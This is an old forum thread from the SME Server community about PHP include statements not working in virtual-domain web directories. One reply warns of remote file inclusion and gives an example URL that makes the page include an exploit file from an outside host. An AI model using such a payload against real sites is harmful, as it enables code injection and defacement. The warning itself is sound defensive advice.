Koozali.org: home of the SME Server
Legacy Forums => General Discussion (Legacy) => Topic started by: Oluf Nissen on December 06, 2002, 08:00:16 AM
-
Hi,
I can't get to work in the "html" directory of ibays that serve webcontent for virtual domains. This is on SME 5.5 Update 2. I tried the PHPBaseDir FAQ trick, but it didn't help. Strangely enough, the above include statement works in files that are in subdirectories to the html folder. The files have .html as their extension, but that should not matter to PHP, should it?
Any help on what's causing this would be much appreciated.
-Oluf
-
set the file type to .php .phtml or .php3
because these file type are the only file types read by the php parses
-
First off, you forgot the semicolon ";" at the end of your line /file.inc");
If that doesn't work, I would try using the full path to the file...
This works with the include's and require_once's on my Geeklog site www.eric-martin.com
-
I pray that you've defined $DOCUMENT_ROOT else where above the code, and that you are not leaving that as an open variable. If you're not, you're creating a HUGE security hole where I could basically manipulate your page.
The code below is insecure:
IE:
http://www.yourdomain.com/yourphpfile.php?DOCUMENT_ROOT=http://www.mydomain.com/exploit
That URL would cause your system to include my .INC file located on my webserver. Inside my include file I could place offensive or document redirection code.
Secondly, by naming your include files (".inc") they may be viewed as plain text because they are not parsed. It is recommended that any of your include files are named as a .PHP so they are parsed by the server. PHP files can contain native HTML code as long as they are not within the PHP delimiter .
Hope this helped,
Nathan